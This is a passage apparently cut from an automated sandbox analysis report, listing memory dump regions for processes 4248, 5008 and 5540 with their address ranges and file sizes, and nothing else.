                                                                                                                                                                            • memory/4248-1004-0x00007FFA942D0000-0x00007FFA947F0000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              5.1MB

                                                                                                                                                                            • memory/4248-997-0x00007FFAA80A0000-0x00007FFAA80B9000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              100KB

                                                                                                                                                                            • memory/4248-1009-0x00007FFA9D550000-0x00007FFA9D57D000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              180KB

                                                                                                                                                                            • memory/4248-1000-0x00007FFA9C570000-0x00007FFA9C593000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              140KB

                                                                                                                                                                            • memory/4248-1003-0x00007FFAA57F0000-0x00007FFAA5809000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              100KB

                                                                                                                                                                            • memory/4248-1006-0x00007FFAA5810000-0x00007FFAA5DF9000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              5.9MB

                                                                                                                                                                            • memory/4248-1007-0x00007FFAA3EC0000-0x00007FFAA3EE3000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              140KB

                                                                                                                                                                            • memory/4248-1011-0x00007FFA9C570000-0x00007FFA9C593000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              140KB

                                                                                                                                                                            • memory/4248-1013-0x00007FFAA57F0000-0x00007FFAA5809000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              100KB

                                                                                                                                                                            • memory/4248-1015-0x00007FFAA92A0000-0x00007FFAA92AD000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              52KB

                                                                                                                                                                            • memory/4248-1016-0x00007FFA948C0000-0x00007FFA948F3000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              204KB

                                                                                                                                                                            • memory/4248-1014-0x00007FFA948C0000-0x00007FFA948F3000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              204KB

                                                                                                                                                                            • memory/4248-1018-0x00007FFA947F0000-0x00007FFA948BD000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              820KB

                                                                                                                                                                            • memory/4248-1008-0x00007FFAAC610000-0x00007FFAAC61F000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              60KB

                                                                                                                                                                            • memory/4248-1020-0x00007FFA942B0000-0x00007FFA942C4000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              80KB

                                                                                                                                                                            • memory/4248-1022-0x00007FFAA9210000-0x00007FFAA921D000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              52KB

                                                                                                                                                                            • memory/4248-1023-0x00007FFA94190000-0x00007FFA942AC000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              1.1MB

                                                                                                                                                                            • memory/4248-962-0x00007FFA9D550000-0x00007FFA9D57D000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              180KB

                                                                                                                                                                            • memory/4248-1019-0x00007FFA942D0000-0x00007FFA947F0000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              5.1MB

                                                                                                                                                                            • memory/4248-1012-0x00007FFA94900000-0x00007FFA94A77000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              1.5MB

                                                                                                                                                                            • memory/4248-1010-0x00007FFAA80A0000-0x00007FFAA80B9000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              100KB

                                                                                                                                                                            • memory/5008-1024-0x00007FFA91EE0000-0x00007FFA929A2000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              10.8MB

                                                                                                                                                                            • memory/5008-1005-0x000001EAA7660000-0x000001EAA7670000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              64KB

                                                                                                                                                                            • memory/5008-998-0x000001EAA7660000-0x000001EAA7670000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              64KB

                                                                                                                                                                            • memory/5008-999-0x000001EAA7660000-0x000001EAA7670000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              64KB

                                                                                                                                                                            • memory/5008-977-0x00007FFA91EE0000-0x00007FFA929A2000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              10.8MB

                                                                                                                                                                            • memory/5540-1017-0x000001FEEC110000-0x000001FEEC120000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              64KB

                                                                                                                                                                            • memory/5540-1002-0x000001FEEC110000-0x000001FEEC120000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              64KB

                                                                                                                                                                            • memory/5540-985-0x000001FEEC110000-0x000001FEEC120000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              64KB

                                                                                                                                                                            • memory/5540-984-0x000001FEEC110000-0x000001FEEC120000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              64KB

                                                                                                                                                                            • memory/5540-983-0x00007FFA91EE0000-0x00007FFA929A2000-memory.dmp

                                                                                                                                                                              Filesize

                                                                                                                                                                              10.8MB